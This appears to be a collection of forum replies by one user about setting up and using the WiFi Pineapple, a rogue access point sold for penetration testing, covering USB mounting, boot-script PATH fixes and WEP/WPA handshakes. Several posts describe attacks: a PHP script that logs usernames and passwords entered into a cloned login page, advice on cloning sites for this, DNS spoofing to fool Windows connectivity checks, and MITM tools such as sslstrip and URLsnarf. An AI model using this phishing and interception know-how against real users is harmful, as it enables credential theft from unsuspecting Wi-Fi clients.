coolgeek

I just wanted to share some video tutorials that I have found very helpful in setting up and administering the WiFi pineapple: Security4Plus I'm not sure if the creator is active on the forums, but I have not seen any links to these tutorials. This resource was indispensable to me for setting up remote administration through a VPS.

The problem is that the key never gets sent in plain text. IEEE 802.11 WEP Authentication works as follows: Client sends a request AP sends client a challenge text (i.e. an arbitrary 128-bit number) The client uses the WEP Key to encrypt the challenge text and sends it to the AP The AP checks for accuracy and grants/denies access based on the result The way that WEP Key cracking works is that by capturing packets we gather samples of challenge text and cyphertext pairs to figure out what the key is. Many samples are needed to crack the key effectively. In theory a Pineapple-esque device should be able to make the client reauthenticate itself over and over until enough cyphertext has been captured to crack the key, but I don't think it would be worth the research since WEP is pretty much obsolete. The other question might be if Jasager could be modified to authenticate clients trying to connect to a WEP network; I'm not sure how much work it would be, but doubt that the practicality would pay off.

This is a possible setup, but you will need a second wifi adapter for your pineapple as well. Blacklisting should not be necessary, since surely you don't have it set to auto connect to any network.

I have read about power issues; try checking if you have the same problem when powering through the AC adapter. Also, are you using a USB hub? If so, try plugging the key directly into the pineapple.

Have you tried using the PoE port on the pineapple instead of the WAN? To my knowledge the PoE port is the one that's configured for 172.16.42.42, where as the WAN port attempts to get the new IP for the pineapple through DHCP.

Probably the easiest way to accomplish this is creating a page that is hosted on the pineapple that redirects traffic to the rick roll of your choice :-)

The only parameter that the manual omitted is that the partitions should be created as Primary. It should show up in the Disk Usage section under Resources, even if the drive does not mount to /usb.

It must be to an ip, but since most www.whatever.com sites have a static ip, that isn't too big of a deal.

I'm pretty sure the PoE port is set to connect to 172.16.42.42. Try to give that a shot.

It seems like a problem with ICS - the pineapple is not getting access to the interwebs. You should be able to confirm this my clicking "reveal public ip" on the status page. The only thing that I can think of is playing with the ./wp4.sh script. Have you tried using all the default values, i.e. just pressing enter without entering your own data?

The problem with WPA/WPA2 secured connections is that a 4-way handshake takes place, in which both AP and client confirm the key without actually revealing it. Read more about the process Here.

I have found the easiest way to clone a site is to use google chrome, browser to the site, right-click and select Save As... This gives you the option to download the entire page with all dependencies. From there, just use this resource to modify what happens to the form data. I think Darren wrote the following little php file to store the user credentials from the form data received: <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("bitches.txt", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?>

You can use the command df -h My output is the following: Filesystem Size Used Available Use% Mounted on rootfs 960.0K 504.0K 456.0K 53% / /dev/root 5.3M 5.3M 0 100% /rom tmpfs 14.4M 572.0K 13.8M 4% /tmp tmpfs 512.0K 0 512.0K 0% /dev /dev/mtdblock3 960.0K 504.0K 456.0K 53% /overlay overlayfs:/overlay 960.0K 504.0K 456.0K 53% / /dev/sda1 28.4G 577.2M 26.4G 2% /usb My usb drive is detected as /dev/sda1, and mounted to /usb through fstab.

I'm using a 32GB PNY drive and have no issues. The only recommendation I have is checking where the drive is being mounted (/dev/sd??) and modifying the fstab config accordingly. Don't forget the "makeswap" command as well.

As a side note, I tested the Network Connection Status Indicator in windows 8, and it seems that as long as it DNS of dns.msftncsi.com resolves to 131.107.255.25 it shows an internet connection - it looks like MS dropped the validation by downloading the text file. So a simply entry into the DNS Spoof Config can validate that request. I tested this and it works like a charm - NCSI shows an internet connection when connected to an offline pineapple. Now I just need to figure out a way to redirect all other traffic, i.e. hosts other than dns.msftncsi.com, to a landing page. A simple wildcard entry overrides the validation DNS. There's no way to set priorities, is there?

SystemCrash86, Which page is showing as the Landing Page in the pineapples Configuration screen? That is what traffic is first redirected to.

I guess you'll have to ask yourself where that traffic is redirected to, and what the purposes of index.php and redirect.php are.

I'm with newbi3 on this. Use the laptop you loaded with Backtrack 5 to do the tinkering and learning how things work. Remember, pen-testing is 90% research.

Maybe the LED Control post will help you out. I don't think there is anything built in, but it shouldn't be too hard to throw together a script that let's you toggle it on and off as many times as you like. Something likes this comes to mind: #!/bin/bash for i in {1..$1} do echo 0 > /sys/class/leds/alfa\:blue\:wps/brightness sleep 1 echo 255 > /sys/class/leds/alfa\:blue\:wps/brightness sleep 1 done In no way elegant, but it should do the job to let you know when a script is starting or has ended.

Good catch, midnitesnake, usb_modeswitch -v 12d1 -p 1446 -V 12d1 -P 1001 -M 55534243123456780000000000000011060000000000000000000000000000 -n 1 -s 20 The pid was switched from the origianl 0x1446 to 0x1001 prior to the insmod command.

Under the Resources tab, make sure the USB drive is mounted under sda1. You should have a line similar to this under "Disk Usage": /dev/sda1 28.4G 576.5M 26.4G 2% /usb I have a suspicion that it might be mounting as sdb1; in that case you would have to change the Config Mount in the USB tab to reflect that.

petertfm, I'm sure that digininja or WM will clarify, but it is my understanding that the keystrokes are captured through a javascript injection as the user types, and is independent of how the data is transferred to the server. sslstripping should not be necessary.

JMBro, You can check the Bandwidth being used with the link on top of the Status module. If you are interested in seeing specific URL traffic, i.e. what websites the target is visiting, you'll need to use a Man in the Middle (MIDM) attack like URLsnarf (Module is available at the Juice Bar).

I think this is a great idea, since it will greatly aid in proving to people the dangers of using WEP. With the Pineapple stowed away in a backpack, one could trigger the module from an Android phone and at least make the impression that it only takes a few clicks to access a WEP network. I have started looking into doing this, and my approach is to port autocrack.sh from http://code.google.com/p/autocrack/ to the WiFi Pineapple. Once I have it working, the second )and probably more difficult part) will be creating a module for it. I'm a n00b when it comes to Linux and Bash scripts, so I believe this will be a good exercise in learning the ropes. If any of you are interested, I'd be more than happy to make this a collaborative project to share the knowledge.

I'm receiving the same errors as tertko. It can't find sslstrip with the default autostart, and once I give it the full path name for sslstrip there is an error finding python. My SSH connection doesn't work properly on start either, but the persist script that runs every 5 minutes "fixes" that. I did a quick check on the environment variables, and it seems like the USB locations aren't added until after the autostat script runs. During autostart.sh: PATH='/sbin:/usr/sbin:/bin:/usr/bin' Pineapple up and running: PATH='/bin:/sbin:/usr/bin:/usr/sbin:/usb/usr/bin:/usb/usr/sbin' The missing env's can be added to make things work, but this seems to be more of an Ad hoc solution: export PATH=${PATH}:/usb/usr/bin:/usb/usr/sbin I need to do further research on when the usb variables are added, and check if it can either be moved up in the startup process or if the execution of autostart can be delayed. Mk4 2.7.0